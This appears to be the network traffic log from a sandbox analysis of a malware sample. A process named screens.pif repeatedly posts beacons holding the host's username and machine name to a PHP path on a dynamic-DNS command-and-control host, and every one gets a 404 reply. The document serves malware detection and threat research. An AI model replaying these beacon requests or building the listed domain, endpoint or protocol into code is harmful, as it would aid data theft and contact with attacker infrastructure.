                                                          Oct 3, 2024 09:20:46.689939976 CEST1.1.1.1192.168.2.100xc7bNo error (0)freighteighttwocam.ddns.net45.149.241.169A (IP address)IN (0x0001)false
                                                          Oct 3, 2024 09:21:46.627782106 CEST1.1.1.1192.168.2.100xd8a7No error (0)freighteighttwocam.ddns.net45.149.241.169A (IP address)IN (0x0001)false
                                                          • www.sodiumlaurethsulfatedesyroyer.com
                                                          • freighteighttwocam.ddns.net
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.104970745.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:20:46.737293959 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 172
                                                          Connection: close
                                                          Oct 3, 2024 09:20:46.743247032 CEST172OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: 'ckav.rubrok301389BROK-PCk0FDD42EE188E931437F4FBE2Cvjza5
                                                          Oct 3, 2024 09:20:47.526560068 CEST169INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:20:47 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.104970845.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:20:47.680047989 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 172
                                                          Connection: close
                                                          Oct 3, 2024 09:20:47.692235947 CEST172OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: 'ckav.rubrok301389BROK-PC+0FDD42EE188E931437F4FBE2CScFzl
                                                          Oct 3, 2024 09:20:48.453088999 CEST169INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:20:47 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.104970945.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:20:48.552500963 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:20:48.567975998 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:20:56.427699089 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:20:55 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.104971545.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:20:56.590853930 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:20:56.608551979 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:20:57.648911953 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:20:56 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          4192.168.2.104971645.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:20:58.069458008 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:20:58.316278934 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:20:59.140589952 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:20:58 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          5192.168.2.104971745.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:20:59.283987045 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:20:59.297568083 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:00.116126060 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:20:59 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          6192.168.2.104971845.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:00.487117052 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:00.494707108 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:01.613163948 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:01 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          7192.168.2.104971945.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:01.772759914 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:01.777715921 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:03.525882006 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:03 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          8192.168.2.104972045.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:03.678724051 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:03.684047937 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:04.410466909 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:03 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          9192.168.2.104972145.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:04.581398010 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:04.600647926 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:05.365163088 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:04 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          10192.168.2.104972245.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:05.520092964 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:05.528198004 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:06.262666941 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:05 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          11192.168.2.104972345.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:06.418783903 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:06.423847914 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:07.156114101 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:06 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.104972445.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:07.330524921 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:07.339145899 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:08.095299959 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:07 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.104972545.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:08.249841928 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:08.254832983 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:09.011538029 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:08 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.104972645.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:09.158802032 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:09.163793087 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:09.861022949 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:09 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.104972745.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:10.033673048 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:10.038727999 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:10.867872000 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:10 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.104972845.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:11.033385038 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:11.038525105 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:11.917903900 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:11 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.104972945.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:12.092761993 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:12.097651005 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:12.878017902 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:12 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          18192.168.2.104973045.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:13.045036077 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
                                                          Content-Encoding: binary
                                                          Content-Key: 5EE1FC9E
                                                          Content-Length: 145
                                                          Connection: close
                                                          Oct 3, 2024 09:21:13.053982019 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 62 00 72 00 6f 00 6b 00 01 00 0c 00 00 00 33 00 30 00 31 00 33 00 38 00 39 00 01 00 0e 00 00 00 42 00 52 00 4f 00 4b 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                                          Data Ascii: (ckav.rubrok301389BROK-PC0FDD42EE188E931437F4FBE2C
                                                          Oct 3, 2024 09:21:13.804303885 CEST177INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.10.3
                                                          Date: Thu, 03 Oct 2024 07:21:13 GMT
                                                          Content-Type: text/html
                                                          Connection: close
                                                          X-Powered-By: PHP/5.3.3
                                                          Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                          Data Ascii: File not found.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          19192.168.2.104973145.149.241.16980688C:\Users\user\Desktop\screens.pif
                                                          TimestampBytes transferredDirectionData
                                                          Oct 3, 2024 09:21:13.958497047 CEST262OUTPOST /mdifygidj/five/fre.php HTTP/1.0
                                                          User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                          Host: freighteighttwocam.ddns.net
                                                          Accept: */*
                                                          Content-Type: application/octet-stream
